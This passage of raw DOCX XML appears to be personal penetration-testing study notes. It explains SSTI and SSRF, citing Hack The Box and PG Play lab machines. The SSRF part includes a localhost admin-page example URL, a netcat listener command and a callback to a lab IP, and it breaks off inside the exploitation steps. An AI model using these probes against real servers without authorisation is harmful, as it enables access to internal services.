    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1299"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this CTF, we did "ls", and then saw the "flag" file. So we did "cat flag", where we got the flag!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CAF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is an SSTI?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-side template injection is a vulnerability where the attacker injects malicious input into a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">template </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in order to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute commands</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the server. It's often mistaken for XSS, since they both involve injecting malicious code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To put it plainly an SSTI is an exploitation technique where the attacker injects native (to the Template Engine) code into a web page. The code is then run via the Template Engine and the attacker gains code execution on the affected server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This attack is very common on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Node.js</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">websites and there is a good possibility that a Template Engine is being used to reflect the email that the user inputs in the contact field.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is also very common on Flask (as shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId942">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Djinn3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CB9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8igim39rt51o" w:id="389"/>
      <w:bookmarkEnd w:id="389"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where SSTI is seen</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want more in-depth practice, look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId943">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Bike Starting Point Box</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Tier 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another box where SSTI is used is the </w:t>
      </w:r>
      <w:hyperlink r:id="rId944">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Djinn3</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CBF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C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C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4dv39t2dzaj8" w:id="390"/>
      <w:bookmarkEnd w:id="390"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC3">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC4">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a type of security vulnerability that allows an attacker to make the server perform unauthorized requests on their behalf. These requests are often made to internal systems or external resources that the attacker might not directly have access to. The vulnerability occurs when the server processes user-supplied input to craft and execute requests without sufficient validation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zxctn5x38rk" w:id="391"/>
      <w:bookmarkEnd w:id="391"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How SSRF Works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">A web application takes user input (e.g., a URL or file path) to fetch a resource (e.g., downloading an image or performing an API call).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The server does not properly validate the user input.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker manipulates the input to craft a malicious request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1382"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The server executes the malicious request, potentially accessing sensitive internal or external resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fetching Internal Resources:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1332"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://example.com/resource?url=http://localhost:8080/admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1332"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The server fetches an internal admin page.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CCF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The Editorial HTB was my introduction to SSRF. I didn't do the box but I read through the walkthrough. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is what they did in the Editorial HTB:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check for SSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There was an input form, and one of the options was a URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try and get a connection to our own IP. So, first set up a listener on port 5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lnvp 5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then, put in the URL of our own IP and port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.10.16.7:5555</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="682"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check to see if we get a connection. If we do, then it might be vulnerable to SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CD9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit SSRF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once we think it's vulnerable to SSRF, that means we can try looking at hidden stuff on the local port (127.0.0.1) that we might not see on the machine's external IP (ex. 10.10.11.20). Even though 127.0.0.1 and 10.10.11.20 might be referring to the same machine from the POV of the target machine, they are different since 127.0.0.1 does not involve the network card or external traffic. It's completely local. While 10.10.11.20 is external. So, certain ports may be open only locally and configured to not be open outside. So, we can start looking at those ports</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CDB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
